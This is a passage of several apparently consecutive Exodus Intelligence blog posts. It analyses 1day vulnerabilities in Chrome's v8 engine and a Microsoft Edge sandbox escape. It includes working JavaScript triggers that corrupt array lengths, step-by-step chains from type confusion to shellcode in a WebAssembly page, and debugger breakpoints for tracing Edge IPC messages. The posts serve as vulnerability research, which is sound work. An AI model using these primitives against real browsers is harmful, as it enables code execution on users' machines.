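Since only the low 32 bits are stored in objects, corrupting a compressed pointer can only redirect it within the same 4GB region, which is why an extra step is needed to reach memory outside the compressed heap.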

The vulnerability grants the addrof and fakeobj primitives readily, as we can treat unboxed double values as tagged pointers or the other way around. However, since pointer compression made tagged pointers 4-byte, it is also possible to write out-of-bounds by using a DOUBLE_ELEMENTS array, turning it into a tagged/SMI ELEMENTS array in the Proxy getter and using Array.prototype.push to add an element to this confused array. The code below uses this to modify the length of a target array to an arbitrary value.

let a = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];
var b;
a.pop();
a.pop();
a.pop();
function empty() {}
function f(nt) {
    a.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);
}
let p = new Proxy(Object, {
    get: function() {
        a[0] = {};
        b = [0.2, 1.2, 2.2, 3.2, 4.3];
        return Object.prototype;
    }
});
function main(o) {
  return f(o);
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);
console.log(b.length);   // prints 819

When the a[0] = {} assignment in the Proxy getter converts a into HOLEY_ELEMENTS storage, its elements storage is reallocated and the unboxed double values are converted to HeapNumbers, so each slot now holds a compressed pointer to a HeapNumber (a map plus the double value). This makes the array shrink to half in size. The following push call still treats the array as if it had HOLEY_DOUBLE storage, writing to length*8 instead of length*4. We use this to corrupt the length of the b array.
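The size mismatch can be put into numbers with a small helper. This is a rough sketch that ignores the elements header and assumes the reallocated store has exactly as many slots as the array has elements; the function name and the sample length are illustrative, not values taken from the exploit.

```javascript
const TAGGED_SIZE = 4; // compressed tagged pointer or SMI
const DOUBLE_SIZE = 8; // unboxed double

// Where a push lands when the store is tagged but indexed as doubles.
function confusedPush(length) {
  const storeBytes = length * TAGGED_SIZE;  // actual size of the element area
  const writeOffset = length * DOUBLE_SIZE; // where the confused push writes
  return { storeBytes, writeOffset, overshoot: writeOffset - storeBytes };
}

// Hypothetical array length, for illustration only.
const example = confusedPush(23);
console.log(example);
```

The overshoot grows linearly with the array length, so the number of elements in a controls how far past the end of the store the 8-byte write lands.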

At this point, the corrupted array can be conveniently used for relative OOB reads and writes with unboxed double values. From here on, exploitation follows these steps:

  • implementing addrof: allocate an object after the corrupted float array and store the target object in one of its inline properties. This inline property can then be read out through the corrupted array.
  • getting absolute read/write access to the compressed heap: place an array with PACKED_DOUBLE_ELEMENTS element kind after the corrupted array, change its elements pointer using the corrupted array to the desired location and read through it.
  • getting absolute uncompressed read/write: TypedArrays use 64-bit backing store pointers as they will support allocations larger than what fits on the compressed heap. Placing a TypedArray after the corrupted array and modifying its backing store thus gives absolute uncompressed read/write access.
  • code execution: load a WASM module, leak the address of the RWX mapping storing the code of one of its functions, replace it with shellcode.

The exploit code can be found here. Note that there’s no sandbox escape vulnerability included.

Conclusion

It took us around 3 days to exploit the vulnerability after discovering the fix. Considering that a potential attacker would try to couple this with a sandbox escape and also work it into their own framework, it seems safe to say that 1day vulnerabilities are impractical to exploit on a weekly or bi-weekly release cycle, hence the title of this post.

Another interesting development that affects exploit development for v8 is pointer compression. It does not complicate matters significantly (it was not meant to do that, anyway) but it might present interesting new avenues for exploitation. For example, the things that reside at the beginning of the heap (the roots, the native context, the table of builtins) are now all at predictable and writable compressed addresses.

The timely analysis of these 1day and nday vulnerabilities is one of the key differentiators of our Exodus nDay Subscription. It enables our customers to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organizations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.

The post A EULOGY FOR PATCH-GAPPING CHROME appeared first on Exodus Intelligence.

Patch-gapping Google Chrome

9 September 2019 at 08:57

Patch-gapping is the practice of exploiting vulnerabilities in open-source software that are already fixed (or are in the process of being fixed) by the developers before the actual patch is shipped to users. This window, in which the issue is semi-public while the user-base remains vulnerable, can range from days to months. It is increasingly seen as a serious concern, with possible in-the-wild uses detected by Google. In a previous post, we demonstrated the feasibility of developing a 1day exploit for Chrome well before a patch is rolled out to users. In a similar vein, this post details the discovery, analysis and exploitation of another recent 1day vulnerability affecting Chrome.

Background

Besides analyzing published vulnerabilities, our nDay team also identifies possible security issues while the fixes are in development. An interesting change list on chromium-review piqued our interest in mid-August. It was for an issue affecting sealed and frozen objects, including a regression test that triggered a segmentation fault. It has been abandoned (and deleted) since then in favor of a different patch approach, with work continuing under CL 1760976, which is a much more involved change.

Since the fix turned out to be so complex, the temporary solution for the 7.7 v8 branch was to disable the affected functionality. This will only be rolled into a stable release on the 10th of September, though. A similar change was made in the 7.6 branch but it came two days after a stable channel update to 76.0.3809.132, so it wasn’t included in that release. As such, the latest stable Chrome release remains affected. These circumstances made the vulnerability an ideal candidate to develop a 1day exploit for.

The commit message is descriptive: the issue is the result of the effects of Object.preventExtensions and Object.seal/freeze on the maps and element storage of objects and how incorrect map transitions are followed by v8 under some conditions. Since map handling in v8 is a complex topic, only the details required to understand the vulnerability will be discussed. More information on the relevant topics can be found under the following links:

Object Layout In v8

JS engines implement several optimizations on the property storage of objects. A common technique is to use separate backing stores for the integer keys (often called elements) and string/Symbol keys (usually referred to as slots or named properties). This allows the engines to potentially use contiguous arrays for properties with integer keys, where the index maps directly to the underlying storage, speeding up access. String keyed values are also stored in an array but to get the index corresponding to the key, another level of indirection is needed. This information, among other things, is provided by the map (or HiddenClass) of the object.

The storage of object shapes in a HiddenClass is another attempt at saving storage space. HiddenClasses are similar in concept to classes in object-oriented languages. However, since it is not possible to know the property configuration of objects in a prototype-based language like JavaScript in advance, they are created on demand. JS engines only create a single HiddenClass for a given shape, which is shared by every object that has the same structure. Adding a named property to an object results in the creation of a new HiddenClass, which contains the storage details for all the previous properties and the new one, then the map of the object is updated, as shown below (figures from the v8 dev blog).

These transitions are saved in a HiddenClass chain, which is consulted when new objects are created with the same named properties, or the properties are added in the same order. If there is a matching transition, it is reused, otherwise a new HiddenClass is created and added to the transition tree.
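The sharing behaviour described above can be modeled with a small transition tree. This is a conceptual sketch, not how v8 represents maps internally; the class and helper names are illustrative.

```javascript
// Each HiddenClass records the property keys seen so far and caches the
// transitions taken from it, so identical shapes end up sharing one instance.
class HiddenClass {
  constructor(keys = []) {
    this.keys = keys;
    this.transitions = new Map();
  }

  // Follow an existing transition for `key`, or create and cache a new one.
  transition(key) {
    if (!this.transitions.has(key)) {
      this.transitions.set(key, new HiddenClass([...this.keys, key]));
    }
    return this.transitions.get(key);
  }

  // Storage index of a named property for objects with this shape.
  indexOf(key) {
    return this.keys.indexOf(key);
  }
}

const rootClass = new HiddenClass();
const shapeOf = (...keys) => keys.reduce((cls, key) => cls.transition(key), rootClass);

const first = shapeOf("x", "y");
const second = shapeOf("x", "y"); // same keys, same order: transition reused
const swapped = shapeOf("y", "x"); // different order: separate branch
console.log(first === second, first === swapped, first.indexOf("y"));
```

Objects built with the same keys in the same order resolve to the same HiddenClass, while a different insertion order follows a different branch of the tree.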

The properties themselves can be stored in three places. The fastest is in-object storage, which only needs a lookup for the key in the HiddenClass to find the index into the in-object storage space. This is limited to a certain number of properties; others are stored in the so-called fast storage, which is a separate array pointed to by the properties member of the object, as shown below.

If an object has many properties added and deleted, it can get expensive to maintain the HiddenClasses. V8 uses heuristics to detect such cases and migrate the object to a slow, dictionary based property storage, as shown on the following diagram.

Another frequent optimization is to store the integer keyed elements in a dense or packed format, if they can all fit in a specific representation, e.g. small integer or float. This bypasses the usual value boxing in the engines, which stores numbers as pointers to Number objects, thus saving space and speeding up operations on the array. V8 handles several such element kinds, for example PACKED_SMI_ELEMENTS, which denotes an elements array with small integers stored contiguously. This storage format is tracked in the map of the object and needs to be kept updated all the time to avoid type confusion issues. Element kinds are organized into a lattice, and transitions are only ever allowed to more general types. This means that adding a float value to an object with PACKED_SMI_ELEMENTS elements kind will convert every value to double, set the newly added value and change the element kind to PACKED_DOUBLE_ELEMENTS.
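The one-way nature of these transitions can be sketched as follows. The model is deliberately reduced: it covers only three packed kinds, ignores the HOLEY variants, and assumes a 31-bit small integer range; the function names are illustrative.

```javascript
// Kinds ordered from most specific to most general.
const KINDS = ["PACKED_SMI_ELEMENTS", "PACKED_DOUBLE_ELEMENTS", "PACKED_ELEMENTS"];

// Most specific kind able to hold `value` (31-bit SMI range assumed).
function requiredKind(value) {
  if (typeof value !== "number") return 2;
  const isSmi = Number.isInteger(value) && !Object.is(value, -0) &&
                value >= -(2 ** 30) && value < 2 ** 30;
  return isSmi ? 0 : 1;
}

// Storing a value can only keep the current kind or move to a more general one.
function kindAfterStore(currentKind, value) {
  const current = KINDS.indexOf(currentKind);
  if (current < 0) throw new RangeError("unknown elements kind: " + currentKind);
  return KINDS[Math.max(current, requiredKind(value))];
}

let kind = "PACKED_SMI_ELEMENTS";
kind = kindAfterStore(kind, 7);   // small integer, kind unchanged
kind = kindAfterStore(kind, 1.1); // float forces the double representation
const afterDouble = kind;
kind = kindAfterStore(kind, 3);   // no transition back to SMI
const afterSmiAgain = kind;
kind = kindAfterStore(kind, {});  // object forces the generic tagged kind
console.log(afterDouble, afterSmiAgain, kind);
```

Once the kind has moved to a more general representation, later stores of more specific values do not move it back.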

preventExtensions, seal and freeze

JavaScript provides several ways to fix the set of properties on an object.

  • Object.preventExtensions: prevents new properties from being added to the object.
  • Object.seal: prevents the addition of new properties, as well as the reconfiguration of existing ones (changing their writable, enumerable or configurable attributes).
  • Object.freeze: the same as Object.seal but also prevents the changing of property values, thus effectively prohibiting any change to an object.
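The differences between the three levels can be checked directly. The sketch below uses the Reflect functions, which report failure through their return value in both strict and sloppy mode; the probe helper and its field names are illustrative.

```javascript
// Try to write, reconfigure and add a property, and report what succeeded.
function probe(obj) {
  return {
    canWrite: Reflect.set(obj, "foo", 3),
    canReconfigure: Reflect.defineProperty(obj, "foo", { enumerable: false }),
    canAdd: Reflect.defineProperty(obj, "bar", { value: 2 }),
  };
}

const results = {
  plain: probe({ foo: 1 }),
  preventExtensions: probe(Object.preventExtensions({ foo: 1 })),
  seal: probe(Object.seal({ foo: 1 })),
  freeze: probe(Object.freeze({ foo: 1 })),
};
console.log(results);
```

Each level removes one more capability: preventExtensions blocks additions, seal also blocks reconfiguration, and freeze also blocks writes.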

PoC analysis

The vulnerability arises because v8 follows map transitions in certain cases without updating the element backing store accordingly, which can have wide-ranging consequences. A modified trigger with comments is shown below.

// Based on test/mjsunit/regress/regress-crbug-992914.js

function mainSeal() {
  const a = {foo: 1.1};   // a has map M1
  Object.seal(a);         // a transitions from M1 to M2 Map(HOLEY_SEALED_ELEMENTS)

  const b = {foo: 2.2};   // b has map M1
  Object.preventExtensions(b);  // b transitions from M1 to M3 Map(DICTIONARY_ELEMENTS)
  Object.seal(b);         // b transitions from M3 to M4
  const c = {foo: Object} // c has map M5, which has a tagged `foo` property, causing the maps of `a` and `b` to be deprecated
  b.__proto__ = 0;        // property assignment forces migration of b from deprecated M4 to M6

  a[5] = 1;               // forces migration of a from the deprecated M2 map, v8 incorrectly uses M6 as new map without converting the backing store. M6 has DICTIONARY_ELEMENTS while the backing store remained unconverted.
}

mainSeal();

In the proof-of-concept code, two objects, a and b, are created with the same initial layout, then a is sealed and Object.preventExtensions and Object.seal are called on b. This causes a to switch to a map with HOLEY_SEALED_ELEMENTS elements kind and b is migrated to slow property storage via a map with DICTIONARY_ELEMENTS elements kind.

The vulnerability is triggered in lines 10-13. Line 10 creates object c with an incompatibly typed foo property. This causes a new map with a tagged foo property to be created for c and the maps of a and b are marked deprecated. This means that they will be migrated to a new map on the next property set operation. Line 11 triggers the transition for b and Line 13 triggers it for a. The issue is that v8 mistakenly assumes that a can be migrated to the same map as b but fails to also convert the backing store. This causes a type confusion to happen between a FixedArray (the Properties array shown in the Object Layout In v8 section) and a NumberDictionary (the Properties Dict).

A type confusion the other way around is also possible, as demonstrated by another regression test in the patch. There are probably also other ways this invalid map transition could be turned into an exploitable primitive, for example by breaking assumptions made by the optimizing JIT compiler.

Exploitation

The vulnerability can be turned into an arbitrary read/write primitive by using the type confusion shown above to corrupt the length of an Array, then using that Array for further corruption of TypedArrays. These can then be leveraged to achieve arbitrary code execution in the renderer process.

FixedArray and NumberDictionary Memory Layout

FixedArray is the C++ class used for the backing store of several different JavaScript objects. It has a simple layout, shown below, with only a map pointer, a length field stored as a v8 small integer (on this 64-bit build without pointer compression, essentially a 32-bit integer left-shifted by 32), then the elements themselves.

pwndbg> job 0x065cbb40bdf1
 0x65cbb40bdf1: [FixedDoubleArray]
 map: 0x1d3f95f414a9 
 length: 16
 0: 0.1
 1: 1
 2: 2
 3: 3
 4: 4
 …
 pwndbg> tel 0x065cbb40bdf0 25
 00:0000   0x65cbb40bdf0 -> 0x1d3f95f414a9 <- 0x1d3f95f401
 01:0008   0x65cbb40bdf8 <- 0x1000000000
 02:0010   0x65cbb40be00 <- 0x3fb999999999999a
 03:0018   0x65cbb40be08 <- 0x3ff0000000000000
 04:0020   0x65cbb40be10 <- 0x4000000000000000
 … 
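The raw values in the dump above can be reproduced from their JavaScript counterparts. This is a small sketch for reading such dumps; the helper names are illustrative, and the small integer encoding assumes the left shift by 32 seen in the length field.

```javascript
// Raw IEEE-754 bit pattern of a double, as it appears in an unboxed elements slot.
function doubleToBits(value) {
  const view = new DataView(new ArrayBuffer(8));
  view.setFloat64(0, value);
  return view.getBigUint64(0);
}

// Raw encoding of a small integer as seen in the length field of the dump.
function smiToRaw(value) {
  return BigInt(value) << 32n;
}

const hex = (n) => "0x" + n.toString(16);

console.log(hex(smiToRaw(16)));      // length field at +0x08
console.log(hex(doubleToBits(0.1))); // element 0 at +0x10
console.log(hex(doubleToBits(1)));   // element 1 at +0x18
console.log(hex(doubleToBits(2)));   // element 2 at +0x20
```

These match the values 0x1000000000, 0x3fb999999999999a, 0x3ff0000000000000 and 0x4000000000000000 in the telescope output.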

The NumberDictionary class implements an integer keyed hash table on top of FixedArray. Its layout is shown below. It has four additional members besides map and length:

  • elements: the number of elements stored in the dictionary.
  • deleted: number of deleted elements.
  • capacity: number of elements that can be stored in the dictionary. The length of the FixedArray backing a number dictionary will be three times its capacity plus the extra header members of the dictionary (four).
  • max number key index: the greatest key stored in the dictionary.

The vulnerability makes it possible to set these four fields to arbitrary values in a plain FixedArray, then trigger the type confusion and treat them as header fields of a NumberDictionary.

pwndbg> job 0x2d7782c4bec9
0x2d7782c4bec9: [NumberDictionary]
- map: 0x0c48e8bc16d9 <Map>
- length: 28
- elements: 4
- deleted: 0
- capacity: 8
- elements: {
0: 0x0c48e8bc04d1 <undefined> -> 0x0c48e8bc04d1 <undefined>
1: 0 -> 16705
2: 0x0c48e8bc04d1 <undefined> -> 0x0c48e8bc04d1 <undefined>
3: 1 -> 16706
4: 0x0c48e8bc04d1 <undefined> -> 0x0c48e8bc04d1 <undefined>
5: 0x0c48e8bc04d1 <undefined> -> 0x0c48e8bc04d1 <undefined>
6: 2 -> 16707
7: 3 -> 16708
}

pwndbg> tel 0x2d7782c4bec9-1 25
00:0000   0x2d7782c4bec8 -> 0xc48e8bc16d9 <- 0xc48e8bc01
01:0008   0x2d7782c4bed0 <- 0x1c00000000
02:0010   0x2d7782c4bed8 <- 0x400000000
03:0018   0x2d7782c4bee0 <- 0x0
04:0020   0x2d7782c4bee8 <- 0x800000000
05:0028   0x2d7782c4bef0 <- 0x100000000
06:0030   0x2d7782c4bef8 -> 0xc48e8bc04d1 <- 0xc48e8bc05
...
09:0048   0x2d7782c4bf10 <- 0x0
0a:0050   0x2d7782c4bf18 <- 0x414100000000
0b:0058   0x2d7782c4bf20 <- 0xc000000000
0c:0060   0x2d7782c4bf28 -> 0xc48e8bc04d1 <- 0xc48e8bc05
...
0f:0078   0x2d7782c4bf40 <- 0x100000000
10:0080   0x2d7782c4bf48 <- 0x414200000000
11:0088   0x2d7782c4bf50 <- 0xc000000000

Elements in a NumberDictionary are stored as three slots in the underlying FixedArray. E.g. the element with the key 0 starts at 0x2d7782c4bf10 above. First comes the key, then the value, in this case a small integer holding 0x4141, then the PropertyDescriptor denoting the configurable, writable, enumerable attributes of the property. The 0xc000000000 PropertyDescriptor corresponds to all three attributes set.
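
The arithmetic behind this layout can be checked against the dump. The sketch below assumes 8-byte slots and the header order listed above; backingLength and entryAddress are hypothetical helper names introduced only for illustration.

```javascript
// Layout constants read off the dump above (64-bit build, 8-byte slots).
const SLOT_SIZE = 8n;
const HEADER_SLOTS = 4;           // elements, deleted, capacity, max number key index
const ENTRY_SLOTS = 3;            // key, value, PropertyDescriptor
const FIRST_ENTRY_OFFSET = 0x30n; // map + length + the four header slots

// Length of the FixedArray backing a dictionary of the given capacity.
const backingLength = (capacity) => ENTRY_SLOTS * capacity + HEADER_SLOTS;

// Untagged address of the key slot of entry `index`.
const entryAddress = (base, index) =>
  base + FIRST_ENTRY_OFFSET + BigInt(index * ENTRY_SLOTS) * SLOT_SIZE;

console.log(backingLength(8));                              // 28
console.log(entryAddress(0x2d7782c4bec8n, 1).toString(16)); // "2d7782c4bf10"
```

A capacity of 8 gives the length of 28 reported by job, and entry 1 (the one holding key 0) lands on the address 0x2d7782c4bf10 referenced above.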

The vulnerability makes all header fields of a NumberDictionary, except length, controllable by setting them to arbitrary values in a plain FixedArray, then treating them as header fields of a NumberDictionary by triggering the issue. While the type confusion can also be triggered in the other direction, it did not yield any immediately promising primitives. Further type confusions can also be caused by setting up a fake PropertyDescriptor to confuse a data property with an accessor property but these also proved too limited and were abandoned.

The capacity field is the most interesting from an exploitation perspective, since it is used in most bounds calculations. When attempting to set, get or delete an element, the HashTable::FindEntry function is used to get the location of the element corresponding to the key. Its code is shown below.

// Find entry for key otherwise return kNotFound.
template <typename Derived, typename Shape>
int HashTable<Derived, Shape>::FindEntry(ReadOnlyRoots roots, Key key,
			int32_t hash) {
	uint32_t capacity = Capacity();
	uint32_t entry = FirstProbe(hash, capacity);
	uint32_t count = 1;
	// EnsureCapacity will guarantee the hash table is never full.
	Object undefined = roots.undefined_value();
	Object the_hole = roots.the_hole_value();
	USE(the_hole);
	while (true) {
		Object element = KeyAt(entry);
		// Empty entry. Uses raw unchecked accessors because it is called by the
		// string table during bootstrapping.
		if (element == undefined) break;
		if (!(Shape::kNeedsHoleCheck && the_hole == element)) {
			if (Shape::IsMatch(key, element)) return entry;
		}
		entry = NextProbe(entry, count++, capacity);
	}
	return kNotFound;
}

The hash tables in v8 use quadratic probing with a randomized hash seed. This means that the hash argument in the code, and the exact layout of dictionaries in memory will change from run to run. The FirstProbe and NextProbe functions, shown below, are used to look for the location where the value is stored. Their size argument is the capacity of the dictionary and thus, attacker-controlled.

inline static uint32_t FirstProbe(uint32_t hash, uint32_t size) {
	return hash & (size - 1);
}

inline static uint32_t NextProbe(uint32_t last, uint32_t number, uint32_t size) {
	return (last + number) & (size - 1);
}

Capacity is a power of two under normal conditions, so masking the probes with capacity-1 limits accesses to in-bounds values. However, setting the capacity to a larger value via the type confusion results in out-of-bounds accesses. The issue with this approach is the random hash seed, which causes probes, and thus out-of-bounds accesses, to land at random offsets. This can easily result in crashes, as v8 will try to interpret any odd value as a tagged pointer.
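
To illustrate why odd values are dangerous, the sketch below classifies raw heap words taken from the dumps earlier in this post. It is a simplified model that assumes only the lowest bit distinguishes a heap pointer from a small integer; isTaggedPointer and untag are hypothetical helper names.

```javascript
// Simplified model: a word with the lowest bit set is treated as a pointer
// to a heap object, while small integers leave that bit clear.
const isTaggedPointer = (raw) => (raw & 1n) === 1n;
const untag = (raw) => raw - 1n;

console.log(isTaggedPointer(0x1d3f95f414a9n));   // true  (map pointer)
console.log(isTaggedPointer(0x1000000000n));     // false (small integer 16)
console.log(untag(0x65cbb40bdf1n).toString(16)); // "65cbb40bdf0"
```

Any odd word read from a random out-of-bounds offset would therefore be dereferenced as if it pointed to a valid object.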

A possible solution is to set capacity to an out-of-bounds number k that is a power of two plus one. Because the probes are masked with k-1, which has a single bit set, the FindEntry algorithm then visits only two possible entries: entry zero and entry k-1 (each entry index is multiplied by three to obtain the slot offset). With careful padding, a target Array can be placed following the dictionary so that its length property sits at just that offset. Invoking a delete operation on the dictionary with a key that is the same as the length of the target Array will cause the algorithm to replace the length with the hole value. The hole is a valid pointer to a static object, in effect a large value, allowing the target Array to be used for more convenient, array-based out-of-bounds read and write operations.
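
The effect of the chosen capacity on the probe sequence can be modeled in a few lines. This is a JavaScript model of the FirstProbe and NextProbe helpers shown above, not v8 code; visitedEntries and the hash constant are hypothetical, and the model ignores the early exit FindEntry takes when it reads an undefined key.

```javascript
// JavaScript model of the two probe helpers; `>>> 0` keeps results unsigned.
const firstProbe = (hash, size) => (hash & (size - 1)) >>> 0;
const nextProbe = (last, number, size) => ((last + number) & (size - 1)) >>> 0;

// Collect the distinct entry indices visited during `steps` probes.
function visitedEntries(hash, capacity, steps = 64) {
  const seen = new Set();
  let entry = firstProbe(hash, capacity);
  for (let count = 1; count <= steps; count++) {
    seen.add(entry);
    entry = nextProbe(entry, count, capacity);
  }
  return [...seen].sort((a, b) => a - b);
}

const hash = 0x9e3779b9; // arbitrary stand-in for the seeded hash
console.log(visitedEntries(hash, 8));    // every index stays below 8
console.log(visitedEntries(hash, 0x41)); // only 0 and/or 0x40 can appear
```

With a legitimate capacity of 8 the probes cover the table and never leave it. With a capacity of 0x41 the mask is 0x40, so whatever the hash is, the only reachable entries are 0 and 0x40.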

While this method can work, it is nondeterministic due to the randomization and the degraded nature of the corrupted NumberDictionary. However, failure does not crash Chrome and is easily detectable; reloading the page reinitializes the hash seed so the exploit can be attempted an arbitrary number of times.

Arbitrary Code Execution

The following object layout is used to gain arbitrary read/write access to the process memory space:

  • o: the object that will be used to trigger the vulnerability.
  • padding: an Array that is used as padding to get the target float array at exactly the right offset from o.
  • float_array: the Array that is the target of the initial length corruption via the out-of-bounds element deletion on o.
  • tarr: a TypedArray used to corrupt the next typed array.
  • aarw_tarr: typed array used for arbitrary memory access.
  • obj_addrof: object used to implement the addrof primitive which leaks the address of an arbitrary JavaScript object.

The exploit achieves code execution by following the usual steps after the initial corruption:

  • Create the layout described above.
  • Trigger the vulnerability, corrupt the length of float_array through the deletion of a property on o. Restart the exploit by reloading the page in case this step fails.
  • Corrupt the length of tarr to increase reliability, since continued usage of the corrupted float array can introduce problems.
  • Corrupt the backing store of aarw_tarr and use it to gain arbitrary read/write access to the address space.
  • Load a WebAssembly module. This maps a read-write-executable memory region of 4KiB into the address space.
  • Traverse the JSFunction object hierarchy of an exported function from the WebAssembly module using the arbitrary read/write primitive to find the address of the read-write-executable region.
  • Replace the code of the WebAssembly function with shellcode and execute it by invoking the function.

The complete exploit code can be found on our GitHub page and seen in action below. Note that a separate vulnerability would be needed to escape the sandbox employed by Chrome.

Detection

The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.

Mitigation

Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.

Conclusion

Subscribers of our nDay feed had access to the analysis and functional exploit 5 working days after the initial patch attempt appeared on chromium-review. A fix in the stable channel of Chrome will only appear in version 77, scheduled to be released tomorrow.

Malicious actors probably have capabilities based on patch-gapping. Timely analysis of such vulnerabilities allows our customers to test how their defensive measures hold up against unpatched security issues. It also enables offensive teams to test the detection and response functions within their organization.

The post Patch-gapping Google Chrome appeared first on Exodus Intelligence.

Pwn2Own 2019: Microsoft Edge Sandbox Escape (CVE-2019-0938). Part 2

27 May 2019 at 09:31

By Arthur Gerkis

This is the second part of the blog post on the Microsoft Edge full-chain exploit. It provides analysis and describes exploitation of a logical vulnerability in the implementation of the Microsoft Edge browser sandbox which allows arbitrary code execution with Medium Integrity Level.

Background

Microsoft Edge employs various Inter-Process Communication (IPC) mechanisms to communicate between content processes, the Manager process and broker processes. The one IPC mechanism relevant to the described vulnerability is implemented as a set of custom message passing functions which extend the standard Windows API PostMessage() function. These functions look like the following:

  • edgeIso!IsoPostMessage(ulong, ulong, ulong, ulong, ulong, _GUID)
  • edgeIso!IsoPostMessageUsingDataInBuffer(ulong, bool)
  • edgeIso!IsoPostMessageUsingVirtualAddress(ulong, ulong, ulong, ulong, uchar *, ulong)
  • edgeIso!IsoPostMessageWithoutBuffer(ulong, ulong, ulong, ulong, _GUID)
  • edgeIso!LCIEPostMessage(ulong, ulong, ulong, ulong, ulong)
  • edgeIso!LCIEPostMessageWithDISPPARAMS(ulong, ulong, uint, ulong, long, tagDISPPARAMS *, int)
  • edgeIso!LCIEPostMessageWithoutBuffer(ulong, ulong, ulong, ulong)

The listed functions are used to send messages with or without data and are stateless. No direct way to get the result of an operation is supported. The functions return only the result of the message posting operation, which does not guarantee that the requested action has completed successfully. The main goal of these functions is to trigger certain events (e.g. when a user clicks on the navigation panel), signal state information, and send notifications of user interface changes.

Messages are sent to the windows of the current process or the windows of the Manager process. A call to PostMessage() is chosen when the message is sent to the current process. For the inter-process messaging a shared memory section and Windows events are employed. The implementation details are hidden from the developer and the direction of the message is chosen based on the value of the window handle. Each message has a unique identifier which denotes the kind of action to perform as a response to the trigger.

Messages that are supposed to be created as a reaction to a user triggered event are passed from one function to another through the virtual layer of different handlers. These handlers process the message and may pass the message further with a different message identifier.

The Vulnerability

The Microsoft Edge Manager process accepts messages from other processes, including content processes. Some messages are meant to be run only internally, without crossing process boundaries. However, a content process can send messages which are supposed to be sent only within the Manager process. If such a message arrives from a content process, it is possible to forge user clicks and thus download and launch an arbitrary binary.
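
The logical flaw can be pictured as a missing sender check. The sketch below is a purely hypothetical model: none of the names are Edge APIs, and it does not describe how Microsoft fixed the issue. The only value taken from this post is the message identifier 0xd6b, which the analysis later ties to running the downloaded file.

```javascript
// Hypothetical model of a dispatcher that refuses internal-only messages
// arriving from another process. Only the identifier 0xd6b is from the post.
const INTERNAL_ONLY_MESSAGES = new Set([0xd6b]);

function shouldDispatch(message) {
  const crossesBoundary = message.sender !== "manager";
  // The check that is effectively absent in the vulnerable code path.
  return !(crossesBoundary && INTERNAL_ONLY_MESSAGES.has(message.id));
}

console.log(shouldDispatch({ sender: "manager", id: 0xd6b })); // true
console.log(shouldDispatch({ sender: "content", id: 0xd6b })); // false
```

Without such a check, a message posted by a compromised content process is indistinguishable from one generated by a real user click inside the Manager process.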

When the download of an executable file is initiated (either by JavaScript code or by user request) the notification bar with buttons appears and the user is offered three options: “Run” to run the offered file, “Download” to download, or “Cancel” to cancel. If the user clicks “Run”, a series of messages are posted from one Manager process window to another. It is possible to see what kind of messages are passed in the debugger by using the following breakpoints:

bu edgeIso!LCIEPostMessage ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!LCIEPostMessageWithoutBuffer ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!LCIEPostMessageWithDISPPARAMS ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessage ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessageWithoutBuffer ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessageUsingVirtualAddress ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
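
Since the six breakpoints differ only in the function name, they can be generated rather than typed by hand. The following is a small convenience sketch; the variable names are arbitrary, and the command string is copied from the breakpoints above.

```javascript
// Function names are taken from the breakpoint list above.
const functions = [
  "LCIEPostMessage",
  "LCIEPostMessageWithoutBuffer",
  "LCIEPostMessageWithDISPPARAMS",
  "IsoPostMessage",
  "IsoPostMessageWithoutBuffer",
  "IsoPostMessageUsingVirtualAddress",
];

// String.raw keeps the backslashes exactly as they appear in the debugger command.
const command = String.raw`.printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g`;
const breakpoints = functions.map((name) => `bu edgeIso!${name} "${command}"`);

console.log(breakpoints.join("\n"));
```

The output can be pasted into the debugger or saved to a script file and loaded at the start of a session.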

There are a large number of messages sent during the navigation and subsequent file download, which forms a complex order of actions. The following list represents a simplified description of the actions performed by either a content process (CP) or the Manager process (MP) during ordinary user activities:

  1. a user clicks on a link to navigate (or the navigation is triggered by JavaScript code)
  2. a navigation event is fired (messages sent from CP to MP)
  3. messages for the modal download notification bar creation and handling are sent (CP to MP)
  4. the modal notification bar appears
  5. messages to handle the navigation and the state of the history are sent (CP to MP)
  6. messages are sent to handle DOM events (CP to MP)
  7. the download is getting handled again; messages with relevant download information are passed (CP to MP)
  8. the user clicks “Run” to run the file download
  9. messages are sent about the state of the download (MP to CP)
  10. the CP responds with updated file download information and terminates download handling in its own process
  11. the MP picks up file download handling and starts sending messages to its own windows (MP to MP)
  12. the MP starts the security scan of the downloaded file (MP to MP)
  13. if the scan has completed successfully, a message is sent to the broker process to run the file
  14. the “browser_broker.exe” broker process launches the executable file

The first message in the series of calls is the response to the user’s click and it initiates the actual series of message passing events. Next follows a message which is important for the exploit because the call stack includes the function which the exploit will imitate. An excerpt from the debugger log file looks like the following:

edgeIso!LCIEPostMessage (00007ffe`d46ab110)(00000402, 00000402, 00000c65, ...)
 # Child-SP          RetAddr           Call Site
00 0000005d`65cfe928 00007ffe`af8de928 edgeIso!LCIEPostMessage
01 0000005d`65cfe930 00007ffe`af696d18 EMODEL!DownloadStateProgress::LCIESendToDownloadManager+0x118
